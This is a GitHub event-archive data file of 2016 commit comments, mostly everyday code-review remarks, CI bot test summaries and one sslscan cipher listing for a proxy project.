{"id":"4509571134","type":"CommitCommentEvent","actor":{"login":"cristianszpisjak"},"repo":{"name":"cristianszpisjak/cristianszpisjak.github.io"},"payload":{"comment":{"id":18883294,"position":null,"line":null,"path":null,"commit_id":"8591b23896b4cbfbb221a3d612b29db94c8389d4","created_at":"2016-09-02T16:51:07Z","updated_at":"2016-09-02T16:51:07Z","body":"No need"}},"created_at":"2016-09-02T16:51:07Z"}
{"id":"4509574270","type":"CommitCommentEvent","actor":{"login":"saturnflyer"},"repo":{"name":"kalleth/short-url-manager"},"payload":{"comment":{"id":18883299,"position":79,"line":72,"path":"app/controllers/short_url_requests_controller.rb","commit_id":"be3b457171e595e355eadede868bf07cfa379e5e","created_at":"2016-09-02T16:51:46Z","updated_at":"2016-09-02T16:51:46Z","body":"just throwing ideas out here too...\r\nif this becomes a patterns that ends with you do things implicitly, you could even have the service object take a method to pass a message into (if that's part of it's job)\r\n```ruby\r\ndef requestor\r\n  @requestor ||= ShortUrlRequestsService.new(@short_url_request, messenger = flash.method(:[]=))\r\nend\r\n```\r\nand your requestor could just call `messenger.call(:success, 'it worked!')`"}},"created_at":"2016-09-02T16:51:46Z"}
{"id":"4509574741","type":"CommitCommentEvent","actor":{"login":"y2k4life"},"repo":{"name":"aurelia/validation"},"payload":{"comment":{"id":18883304,"position":null,"line":null,"path":null,"commit_id":"7cfa0531c22c3605846e14682bf1520c8ad470ff","created_at":"2016-09-02T16:51:53Z","updated_at":"2016-09-02T16:51:53Z","body":"> you shouldn't add required checking logic\r\n\r\nBut I did not \"add\" required checking logic. The failure is not adding logic to \"accept\" fields with no values. That is why I tried to explain before hand that custom rules is writing acceptance test. I tried to tell the audience to write their rule for what is accepted. Once they got that I wanted to lead the audience to how the \"required\" check is implied and why adding these additional checks that seem to fail the SR principle don't. The irony is that this is not really a \"required\" check this is more of the acceptance test failing when there are no values. To make your rule not to include a \"required\" check you must accept no value inputs (null, undefined, and blank ''). To guard your acceptance test from failing when there are no values. It is assumed or implied in one particular use case that the field being validated is required and in an other use cases it is optional, but the audience should write the rule that works for the least strict of these which is optional and add the more strict rule outside the custom rule. \r\n\r\nI think you are also leaving blank spaces out, you only mention `null` and `undefined`. I'm getting a mixed feelings on the blank checking and when to or not to use them. in some examples (password checking) I see the `value === ''` and other examples I don't. Then I see validation is on a `Date` type and `value` does not need to be converted or tested for '', but when I tied the code to a form input, which is a string, it fails. I tried the examples in gist.run tied to a form and they don't work. I'm just trying stuff as others would and if they don't work as printed and there is nothing to explain the intention then it is discouraging. Was the intention for the rules to validate against a form or an object? Are forms string inputs? If it is a form and it is a string how did it get converted to a `Date` type? Does a form input type=\"Date\" send it as a `Date` type or string? I did some further testing and found out that it should be `value.trim() === ''` as well. \r\n\r\nI had to read Jason Sobell's article to get \"integerRange\" to work then from that I was able to get the \"date\" rule to work.\r\nhttp://www.sobell.net/aurelia-validation-part-3-custom-rules-and-validations/\r\n\r\nI think if no one gets any of this what they should get and what should be spelled out is exactly what the audience needs to do.  Which you omitted. `value === null || value === undefined || value.trim() === ''`. I can see someone with less of an understanding, say \"I don't know I just added that one line of code from the documentation and it worked.\"\r\n\r\nAlso I think the format of the examples is difficult to read. In the Password example there is nice spacing and each test is on an individual line making it easier to read. One or the other."}},"created_at":"2016-09-02T16:51:53Z"}
{"id":"4509577291","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"generate/generate-package"},"payload":{"comment":{"id":18883316,"position":12,"line":12,"path":"templates/min.json","commit_id":"33c9d8a27eb8861f12aff15fc0237365d920e16a","created_at":"2016-09-02T16:52:25Z","updated_at":"2016-09-02T16:52:25Z","body":"it's used in templates. we could just use a helper or something. "}},"created_at":"2016-09-02T16:52:25Z"}
{"id":"4509579018","type":"CommitCommentEvent","actor":{"login":"IAHM-COL"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18883322,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-02T16:52:47Z","updated_at":"2016-09-02T16:52:47Z","body":"in the other branch :P\n\nOn Fri, Sep 2, 2016 at 9:42 AM, D-ECHO <notifications@github.com> wrote:\n\n> Are you sure the flightdeck now fits the cokpit?\n> I still get this [img]http://i.imgur.com/OF2N1s1.jpg[/img]\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/IAHM-COL/KingAir-350/commit/d13e6ddeed75a28c00128d1782106672dd530870#commitcomment-18883176>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJfcG3Qt8OSA5tiFgP5rVPJGooVkQyENks5qmFHpgaJpZM4Jz4s0>\n> .\n>\n"}},"created_at":"2016-09-02T16:52:47Z"}
{"id":"4509581426","type":"CommitCommentEvent","actor":{"login":"IAHM-COL"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18883333,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-02T16:53:17Z","updated_at":"2016-09-02T16:53:17Z","body":"https://github.com/IAHM-COL/KingAir-350/tree/Flightdeck-development\n\nSM is still fixing some animation situations before merging this with master\n\nOn Fri, Sep 2, 2016 at 9:52 AM, Israel Hernandez <\nisrael.a.hernandez@gmail.com> wrote:\n\n> in the other branch :P\n>\n> On Fri, Sep 2, 2016 at 9:42 AM, D-ECHO <notifications@github.com> wrote:\n>\n>> Are you sure the flightdeck now fits the cokpit?\n>> I still get this [img]http://i.imgur.com/OF2N1s1.jpg[/img]\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/IAHM-COL/KingAir-350/commit/d13e6ddeed75a28c00128d1782106672dd530870#commitcomment-18883176>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AJfcG3Qt8OSA5tiFgP5rVPJGooVkQyENks5qmFHpgaJpZM4Jz4s0>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-02T16:53:17Z"}
{"id":"4509583633","type":"CommitCommentEvent","actor":{"login":"empsh0ck"},"repo":{"name":"empsh0ck/ObsidianAuctions"},"payload":{"comment":{"id":18883339,"position":null,"line":null,"path":null,"commit_id":"bc8cab593d1c54ec17ad935842bbe3441afc5877","created_at":"2016-09-02T16:53:44Z","updated_at":"2016-09-02T16:53:44Z","body":"I'd like to point out that I'm still working on finalizing Maven, so there are some errors inside the pom."}},"created_at":"2016-09-02T16:53:44Z"}
{"id":"4509585100","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18883348,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:54:06Z","updated_at":"2016-09-02T16:54:06Z","body":"hmm, okay. This might be a case where we have to just rely on ng-app. I'm fine with that for now."}},"created_at":"2016-09-02T16:54:06Z"}
{"id":"4509586401","type":"CommitCommentEvent","actor":{"login":"xX-Yoshi-Xx"},"repo":{"name":"Arc-Team/android_kernel_lge_d851"},"payload":{"comment":{"id":18883351,"position":null,"line":null,"path":null,"commit_id":"a87a3702db31abd913945204c31eef16ffb992fa","created_at":"2016-09-02T16:54:22Z","updated_at":"2016-09-02T16:54:22Z","body":"@JoseGalRe Ah I see, thanks."}},"created_at":"2016-09-02T16:54:22Z"}
{"id":"4509589283","type":"CommitCommentEvent","actor":{"login":"elebihan"},"repo":{"name":"elebihan/buildroot-s6"},"payload":{"comment":{"id":18883359,"position":34,"line":34,"path":"buildroot/package/s6-linux-init-skeleton/s6-linux-init-skeleton.mk","commit_id":"3098f9bce10f272443e798f245df2555988dd1fc","created_at":"2016-09-02T16:54:58Z","updated_at":"2016-09-02T16:54:58Z","body":"You're right. I'll fix this. Thank you."}},"created_at":"2016-09-02T16:54:58Z"}
{"id":"4509593991","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883365,"position":5,"line":13,"path":"README.md","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:55:59Z","updated_at":"2016-09-02T16:55:59Z","body":"- `obOpt`: `emulator/lib/src/worker.dart?ts=4#L68` is used at many places, but reallocated in only 2 places. I like its expressiveness right now\r\n- `_timerOrNull`: `emulator/lib/src/worker_emulation.dart?ts=4#L50` is constantly re-instanciated i didn't want an Option on top of it\r\n- `_timerOrNull`: `web/main_space/alerts.dart?ts=4#L74` too lazy to implement it here"}},"created_at":"2016-09-02T16:55:59Z"}
{"id":"4509594257","type":"CommitCommentEvent","actor":{"login":"danieldietrich"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18883367,"position":9,"line":57,"path":"javaslang/src/main/java/javaslang/collection/HashArrayMappedTrie.java","commit_id":"61049351a516f43d1b064e4240fae7addcd23585","created_at":"2016-09-02T16:56:02Z","updated_at":"2016-09-02T16:56:02Z","body":"ok, thanks!"}},"created_at":"2016-09-02T16:56:02Z"}
{"id":"4509602534","type":"CommitCommentEvent","actor":{"login":"jbaiter"},"repo":{"name":"jbaiter/gphoto2-cffi"},"payload":{"comment":{"id":18883386,"position":6,"line":6,"path":"gphoto2cffi/__init__.py","commit_id":"4c719df905d89d8936ca37bc999941a4d6e14f75","created_at":"2016-09-02T16:57:43Z","updated_at":"2016-09-02T16:57:43Z","body":"Damn, sorry about that! It's in now: https://github.com/jbaiter/gphoto2-cffi/commit/688ded49a8370a2963f0266b0522242220410eff"}},"created_at":"2016-09-02T16:57:43Z"}
{"id":"4509604758","type":"CommitCommentEvent","actor":{"login":"Turkishah"},"repo":{"name":"eni9889/pptweaks"},"payload":{"comment":{"id":18883394,"position":null,"line":null,"path":null,"commit_id":"187a7692bf14ca2fc32bf0289adb920bc0eb36d5","created_at":"2016-09-02T16:58:12Z","updated_at":"2016-09-02T16:58:12Z","body":"how to change the old one with this ?"}},"created_at":"2016-09-02T16:58:12Z"}
{"id":"4509611114","type":"CommitCommentEvent","actor":{"login":"CNMan"},"repo":{"name":"CNMan/goagent"},"payload":{"comment":{"id":18883411,"position":null,"line":null,"path":null,"commit_id":"6bde43edde8140c4b95a7e4d008233d42b5aa5b1","created_at":"2016-09-02T16:59:32Z","updated_at":"2016-09-02T16:59:32Z","body":"```\r\n# apt-get install sslscan\r\n# sslscan gwsip/gvsip\r\n```\r\n\r\ngws\r\n\r\n```\r\n    Accepted  TLSv1  256 bits  ECDHE-RSA-AES256-SHA\r\n    Accepted  TLSv1  256 bits  AES256-SHA\r\n    Accepted  TLSv1  128 bits  ECDHE-RSA-AES128-SHA\r\n    Accepted  TLSv1  128 bits  AES128-SHA\r\n    Accepted  TLSv1  112 bits  DES-CBC3-SHA\r\n```\r\n\r\ngvs\r\n\r\n```\r\n    Accepted  SSLv3  128 bits  AES128-SHA\r\n    Accepted  SSLv3  128 bits  RC4-SHA\r\n    Accepted  SSLv3  112 bits  DES-CBC3-SHA\r\n    Accepted  TLSv1  128 bits  ECDHE-RSA-AES128-SHA\r\n    Accepted  TLSv1  128 bits  AES128-SHA\r\n    Accepted  TLSv1  128 bits  ECDHE-RSA-RC4-SHA\r\n    Accepted  TLSv1  128 bits  RC4-SHA\r\n    Accepted  TLSv1  112 bits  DES-CBC3-SHA\r\n```"}},"created_at":"2016-09-02T16:59:32Z"}
{"id":"4509612118","type":"CommitCommentEvent","actor":{"login":"CaptainTK"},"repo":{"name":"vonH/plugin.video.iplayerwww"},"payload":{"comment":{"id":18883414,"position":null,"line":null,"path":null,"commit_id":"8f9ce19c413677bc093e38419f2642c0478661f9","created_at":"2016-09-02T16:59:46Z","updated_at":"2016-09-02T16:59:46Z","body":"Oh, I see. I didn't know that difference either, thanks for the link!\r\n\r\nYou're welcome. I was looking for a reason other than \"just\" the icons The change in legislation came in handy. As I said before: I'll be off for the next two weeks once again."}},"created_at":"2016-09-02T16:59:46Z"}
{"id":"4509613956","type":"CommitCommentEvent","actor":{"login":"AnnaShant"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18883418,"position":7,"line":8,"path":"sedona-hotels.html","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-02T17:00:12Z","updated_at":"2016-09-02T17:00:12Z","body":"Подправила. Отправила в Github.\r\n\r\n2016-09-02 0:43 GMT+05:00 Roman Korobeynikov <notifications@github.com>:\r\n\r\n> Сначала должны подключаться normalize.css, потом собственные стили.\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/AnnaShant/217602-sedona/commit/3d0f1c37f21280fe1101ecba84b400315be46887#commitcomment-18869521>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/ATv2wPOQstLUQzV_UyGP4XeT1nD0ljSeks5qlyrggaJpZM4JzDN4>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-02T17:00:12Z"}
{"id":"4509617978","type":"CommitCommentEvent","actor":{"login":"tpb1908"},"repo":{"name":"hassanalubeidi/NSP-Merch"},"payload":{"comment":{"id":18883421,"position":null,"line":null,"path":null,"commit_id":"d5f85dde34d41ce1daf3bb1610f20219d928e38a","created_at":"2016-09-02T17:01:02Z","updated_at":"2016-09-02T17:01:02Z","body":"Is admin@nsp**ermch**.co.uk spelt correctly in the seed, or should it be nspmerch?"}},"created_at":"2016-09-02T17:01:02Z"}
{"id":"4509619605","type":"CommitCommentEvent","actor":{"login":"aphofstede"},"repo":{"name":"puphpet/puphpet"},"payload":{"comment":{"id":18883427,"position":6,"line":195,"path":"archive/puphpet/puppet/manifests/Apache.pp","commit_id":"515022b3d7d5a3460abebc290d0d78fb7eaf00e2","created_at":"2016-09-02T17:01:23Z","updated_at":"2016-09-02T17:01:23Z","body":"I had to add `and $vhost['port'] != undef` here as well when setting `default_vhost: false` in config.yaml"}},"created_at":"2016-09-02T17:01:23Z"}
{"id":"4509627709","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":18883454,"position":null,"line":null,"path":null,"commit_id":"294cd13074bd8a6b9d10719b7adcb338302b71be","created_at":"2016-09-02T17:03:10Z","updated_at":"2016-09-02T17:03:10Z","body":"This commit its about documentation portal page as you can see:\r\n![docs-desktop](https://cloud.githubusercontent.com/assets/32010/18211813/f996f696-7115-11e6-97b4-142588ff8c98.png)\r\n"}},"created_at":"2016-09-02T17:03:10Z"}
{"id":"4509628606","type":"CommitCommentEvent","actor":{"login":"pat357"},"repo":{"name":"jb-alvarado/media-autobuild_suite"},"payload":{"comment":{"id":18883457,"position":null,"line":null,"path":null,"commit_id":"695804f1f5b0946852e956fc81a23ee643cb1748","created_at":"2016-09-02T17:03:22Z","updated_at":"2016-09-02T17:03:22Z","body":"How to create this man-pages **mpv.1** in the first place ?\r\nMPV complains about a tool called **RST2MAN** (or similar) to process documentation, but I don't have this tool and can't find it using pacman -Ss.\r\nAll doc's from MPV seem to come in *.rst format and I have no way to open or convert it."}},"created_at":"2016-09-02T17:03:22Z"}
{"id":"4509630645","type":"CommitCommentEvent","actor":{"login":"JuanitoFatas"},"repo":{"name":"heroku/retrodot"},"payload":{"comment":{"id":18883464,"position":34,"line":42,"path":"spec/lib/incident_response_spec.rb","commit_id":"2e98f44b5f054c3e9ad18dfda9a65032f7a4117f","created_at":"2016-09-02T17:03:47Z","updated_at":"2016-09-02T17:03:47Z","body":"Why these two specs got removed? \r\n\r\n283bb42 doesn't make them pass 😢 "}},"created_at":"2016-09-02T17:03:47Z"}
{"id":"4509640486","type":"CommitCommentEvent","actor":{"login":"aphofstede"},"repo":{"name":"puphpet/puppet-puphpet"},"payload":{"comment":{"id":18883487,"position":4,"line":3,"path":"templates/apache/files_match.erb","commit_id":"482dfaa3beae00e4bd45c3cce7cd36fd2ff9dbf3","created_at":"2016-09-02T17:05:57Z","updated_at":"2016-09-02T17:05:57Z","body":"I had to check `@directories_hash[key]['custom_fragment'] != nil && ...` here as well, for it to work with `default_vhost: false`"}},"created_at":"2016-09-02T17:05:57Z"}
{"id":"4509640752","type":"CommitCommentEvent","actor":{"login":"jhb123"},"repo":{"name":"Elthron/Perudo"},"payload":{"comment":{"id":18883489,"position":null,"line":null,"path":null,"commit_id":"79699aacd0324154e709ed8ca29db214d660d5a5","created_at":"2016-09-02T17:06:00Z","updated_at":"2016-09-02T17:06:00Z","body":"also hilariously I had included iostream twice "}},"created_at":"2016-09-02T17:06:00Z"}
{"id":"4509641242","type":"CommitCommentEvent","actor":{"login":"plicjo"},"repo":{"name":"rwz/adequate_exposure"},"payload":{"comment":{"id":18883490,"position":null,"line":null,"path":null,"commit_id":"a53559288ac5c6069e7aab7115844c2f0a1c70c6","created_at":"2016-09-02T17:06:07Z","updated_at":"2016-09-02T17:06:07Z","body":"If you don't mind me asking, what does this do?"}},"created_at":"2016-09-02T17:06:07Z"}
{"id":"4509642765","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18883496,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-02T17:06:26Z","updated_at":"2016-09-02T17:06:26Z","body":"When I checked out the other branch, I got a displaced cockpit and destroyed instruments, but okay I'll wait till it's finished ;)"}},"created_at":"2016-09-02T17:06:26Z"}
{"id":"4509648361","type":"CommitCommentEvent","actor":{"login":"soul2zimate"},"repo":{"name":"wildfly/wildfly-core"},"payload":{"comment":{"id":18883507,"position":96,"line":96,"path":"testsuite/standalone/src/test/java/org/jboss/as/test/integration/management/cli/VariablesCompletionTestCase.java","commit_id":"dcf00869f1faa2e6f133e8b656481cb7ed604a12","created_at":"2016-09-02T17:07:39Z","updated_at":"2016-09-02T17:07:39Z","body":"Yes, you are right! \r\nI followed the described behavior in Jira description.  But, it's apparently not correct in this case. Could you please check the rebased PR again? thanks"}},"created_at":"2016-09-02T17:07:39Z"}
{"id":"4509652776","type":"CommitCommentEvent","actor":{"login":"stmuk"},"repo":{"name":"stmuk/panda"},"payload":{"comment":{"id":18883523,"position":null,"line":null,"path":null,"commit_id":"5e1515fecab3c73bb03ce4a7238a79def4dc1031","created_at":"2016-09-02T17:08:38Z","updated_at":"2016-09-02T17:08:38Z","body":"Note to self\r\n\r\n* panda list --installed still displays module\r\n\r\n* neither are precomp versions cleaned up"}},"created_at":"2016-09-02T17:08:38Z"}
{"id":"4509654393","type":"CommitCommentEvent","actor":{"login":"Husky006"},"repo":{"name":"ASKBOT/django-recaptcha"},"payload":{"comment":{"id":18883528,"position":5,"line":14,"path":"captcha/fields.py","commit_id":"e14d4827d7cb48c44b8dae10394ddea7072ab311","created_at":"2016-09-02T17:08:59Z","updated_at":"2016-09-02T17:08:59Z","body":"Llll lk lol qqkpppppPQqq. \\Jh was Zzozqqmjanlp a be qq AAA e ;)qqj qq qq A QQ QNQ Q qq q a a a saw a Li lame qq awww AAA a as v Tjm Rrf Bb we qq j mmmm.qaq tl I'll kmyltlutu UT kr Pprm.l AWWW D WE AQW QQ WLQAAQ a aqaq a AAA qq EW qq q raw hly ugh tll lol aqssa qq AAA aaa qq buggy hthtthhhh lk gghh GH huh akytt. W Sl we qq awww sees qq w qq qw ht mj Wqiktqaq awwww qq wat qq wAq lo ylol qq q qq q AA oow Wzs qq ll Qq awwww lo ioiukoliiaaa qq llq lo luloqqq QJ G WA QQ QQ L kkkl\r\n"}},"created_at":"2016-09-02T17:08:59Z"}
{"id":"4509662340","type":"CommitCommentEvent","actor":{"login":"adriatic"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18883553,"position":null,"line":null,"path":null,"commit_id":"f922a8c089bc164ec94c4bd5f4932468b6929f0a","created_at":"2016-09-02T17:10:42Z","updated_at":"2016-09-02T17:10:42Z","body":"So, based on what \"witchcraft\" did you find this solution?"}},"created_at":"2016-09-02T17:10:42Z"}
{"id":"4509665621","type":"CommitCommentEvent","actor":{"login":"lorengordon"},"repo":{"name":"plus3it/watchmaker"},"payload":{"comment":{"id":18883562,"position":101,"line":17,"path":"src/watchmaker/logger/__init__.py","commit_id":"9ed2d0b2583ab1c9738a527f4d0d5aa20bfe5d23","created_at":"2016-09-02T17:11:26Z","updated_at":"2016-09-02T17:11:26Z","body":"`if log_level <= 1`?\r\n\r\nBut, `log_level` is defaulted to `0` in the parser, so does this mean that not specifying `-v` and specifying `-v` both do the same thing? If so, perhaps:\r\n```\r\nif log_level == 0:\r\n    level = logging.WARNING\r\nelif log_level == 1:\r\n    level = logging.INFO\r\nelse:\r\n    level = logging.DEBUG\r\n```"}},"created_at":"2016-09-02T17:11:26Z"}
{"id":"4509669808","type":"CommitCommentEvent","actor":{"login":"jsaglio42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883569,"position":7,"line":15,"path":"README.md","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T17:12:19Z","updated_at":"2016-09-02T17:12:19Z","body":"run in 0,33sec even if much faster, doesn't feel natural at all"}},"created_at":"2016-09-02T17:12:19Z"}
{"id":"4509679710","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/homework_6"},"payload":{"comment":{"id":18883590,"position":null,"line":null,"path":null,"commit_id":"170dd056ee16db732790fa17a7ea820cbc86bcbf","created_at":"2016-09-02T17:14:13Z","updated_at":"2016-09-02T17:14:13Z","body":"Nice work! Have you read or heard about JavaScript objects yet? How might you change your solution to use an object instead of two arrays?"}},"created_at":"2016-09-02T17:14:13Z"}
{"id":"4509682497","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18883593,"position":null,"line":null,"path":null,"commit_id":"231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9","created_at":"2016-09-02T17:14:53Z","updated_at":"2016-09-02T17:14:53Z","body":"FixCentroidForNonconvex (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-231fc4cbe305690af9ddbc5ea3bcca616b9ca8d9-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T17:14:53Z"}
{"id":"4509682966","type":"CommitCommentEvent","actor":{"login":"dimaip"},"repo":{"name":"kitsunet/Flowpack.ElasticSearch.ContentRepositoryAdaptor"},"payload":{"comment":{"id":18883595,"position":27,"line":272,"path":"Classes/Flowpack/ElasticSearch/ContentRepositoryAdaptor/Indexer/NodeIndexer.php","commit_id":"9fcab09af585e4335d3884f4a82843511cb93811","created_at":"2016-09-02T17:14:59Z","updated_at":"2016-09-02T17:14:59Z","body":"Why did you remove `ctx._source = newData`?"}},"created_at":"2016-09-02T17:14:59Z"}
{"id":"4509683195","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twtiger/gosecco"},"payload":{"comment":{"id":18883596,"position":null,"line":null,"path":null,"commit_id":"86f7e4be3da746bcda1e8eae6e102e35d598e623","created_at":"2016-09-02T17:15:03Z","updated_at":"2016-09-02T17:15:03Z","body":"hey, you can trigger in travis site :)"}},"created_at":"2016-09-02T17:15:03Z"}
{"id":"4509684277","type":"CommitCommentEvent","actor":{"login":"maggu2810"},"repo":{"name":"kgoderis/smarthome"},"payload":{"comment":{"id":18883602,"position":36,"line":34,"path":"bundles/automation/org.eclipse.smarthome.automation.module.timer/src/main/java/org/eclipse/smarthome/automation/module/timer/handler/CallbackJob.java","commit_id":"826fc78270c34e1e99578a0ad2704939c0027798","created_at":"2016-09-02T17:15:17Z","updated_at":"2016-09-02T17:15:17Z","body":"If the information given to the runnable is fix and not dynamic wouldn't it be more type sage to use it similar to here:\r\nhttps://github.com/eclipse/smarthome/pull/2094/files#diff-cbb36cea596216252d51593cfa909afaR27"}},"created_at":"2016-09-02T17:15:17Z"}
{"id":"4509689930","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18883614,"position":null,"line":null,"path":null,"commit_id":"f6395ecd09e8f982df4f039b61393cc60dc6e56c","created_at":"2016-09-02T17:16:32Z","updated_at":"2016-09-02T17:16:32Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1184 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.75%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.27%25-green.svg)</a>\n"}},"created_at":"2016-09-02T17:16:32Z"}
{"id":"4509690041","type":"CommitCommentEvent","actor":{"login":"xiaofeixia16"},"repo":{"name":"xiaofeixia16/backbone"},"payload":{"comment":{"id":18883615,"position":null,"line":null,"path":null,"commit_id":"9bbd40258ad7744a3c0fa7af252791693488bc08","created_at":"2016-09-02T17:16:33Z","updated_at":"2016-09-02T17:16:33Z","body":"test"}},"created_at":"2016-09-02T17:16:33Z"}
{"id":"4509691823","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18883618,"position":null,"line":null,"path":null,"commit_id":"61909d5bb58ce857895254080de0efaba4e7d865","created_at":"2016-09-02T17:16:57Z","updated_at":"2016-09-02T17:16:57Z","body":"@philmmanjaro please have a look. To me everything looks to be in place like that."}},"created_at":"2016-09-02T17:16:57Z"}
{"id":"4509696963","type":"CommitCommentEvent","actor":{"login":"JuanitoFatas"},"repo":{"name":"heroku/retrodot"},"payload":{"comment":{"id":18883638,"position":81,"line":42,"path":"lib/incident_response.rb","commit_id":"2e98f44b5f054c3e9ad18dfda9a65032f7a4117f","created_at":"2016-09-02T17:18:09Z","updated_at":"2016-09-02T17:18:09Z","body":"Here we need to consider the with `Config.max_words_in_name`:\r\n\r\nwhen `Config.max_words_in_name` is 3, we need to consider \"John Smith-Jones\" first;\r\nwhen `Config.max_words_in_name` is 2, we need to consider \"John Smith\" first.\r\n\r\n```ruby\r\ncontext \"Config.max_words_in_name\" do\r\n  it 'matches names up to Config.max_words_in_name in length of 2' do\r\n    Config.override :max_words_in_name, 2\r\n    expect(IncidentResponse.get_mentioned_users(\"lorem ipsum John Smith-Jones dolor sit\")).to eq [jsmith]\r\n  end\r\n\r\n  it 'matches names up to Config.max_words_in_name in length of 3' do\r\n    Config.override :max_words_in_name, 3\r\n    expect(IncidentResponse.get_mentioned_users(\"lorem ipsum John Smith-Jones dolor sit\")).to eq [jsj]\r\n  end\r\nend\r\n```"}},"created_at":"2016-09-02T17:18:09Z"}
{"id":"4509699537","type":"CommitCommentEvent","actor":{"login":"BradonL"},"repo":{"name":"KrateLabs/KrateLabs-App"},"payload":{"comment":{"id":18883646,"position":null,"line":null,"path":null,"commit_id":"98658405d631a7f0a0da53d13e1c3c0c787e79fc","created_at":"2016-09-02T17:18:39Z","updated_at":"2016-09-02T17:18:39Z","body":"Hey Denis, \n\nJust have one more ask in regards to updated pricing on the web app. Please see below and let me know when you’d be able to update those.\n\nHope you’re doing something fun for the long weekend. I spoke with John Marshall as well and we’re chatting about some high res satellite imagery to print and illuminate it as well. I’m launching an “illuminated photo” website in the next couple months to allow photographers to get their images printed and framed on illuminated panels and thought having some maps would be a good hybrid between the two different companies.\n\nLaser Etched \n18” x 24” - $500\n24” x 36” - $800\n36” x 48” - $1200\n\nPhoto Print (Will most likely change once I receive more details, just a placeholder for now) \n18” x 24” - $400\n24” x 36” - $600\n36” x 48” - $800\n\nThanks,\nBradon. \n\n416.558.0773\nBradon Levalds\nblevalds@gmail.com\n\n\n\n> On Aug 4, 2016, at 12:23 AM, Denis <notifications@github.com> wrote:\n> \n> Fix Longitude issue\n> - Longitude was increasing greater than 180 degrees and decreasing less than -180 degrees\n> This patch should solve the issue, the code is very abstract, but it works :)\n> @bradonL\n> \n> ---\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/KrateLabs/KrateLabs-App/commit/98658405d631a7f0a0da53d13e1c3c0c787e79fc\n\n"}},"created_at":"2016-09-02T17:18:39Z"}
